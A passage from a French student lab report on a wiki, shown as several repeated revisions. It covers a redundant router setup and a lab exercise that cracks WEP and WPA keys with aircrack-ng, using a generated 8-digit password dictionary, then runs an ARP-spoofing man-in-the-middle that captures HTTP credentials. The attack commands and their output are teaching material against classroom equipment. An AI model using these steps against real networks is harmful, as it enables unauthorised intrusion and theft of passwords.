<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Pastabox.site-2020-11-13-08_50_33-UTC.png&diff=53562Fichier:Pastabox.site-2020-11-13-08 50 33-UTC.png2020-11-13T09:37:03Z<p>Tvitteco : </p>
<hr />
<div></div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53300TP sysres IMA2a5 2020/2021 G62020-11-06T09:56:58Z<p>Tvitteco : /* attaque par homme du millieu */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53218TP sysres IMA2a5 2020/2021 G62020-11-04T17:28:36Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53208TP sysres IMA2a5 2020/2021 G62020-11-04T17:01:43Z<p>Tvitteco : /* crackage Wpa */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53207TP sysres IMA2a5 2020/2021 G62020-11-04T17:00:29Z<p>Tvitteco : /* crackage Wpa */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
<br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
<br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
<br />
KEY FOUND! [ 20133333 ]<br />
<br />
<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
<br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
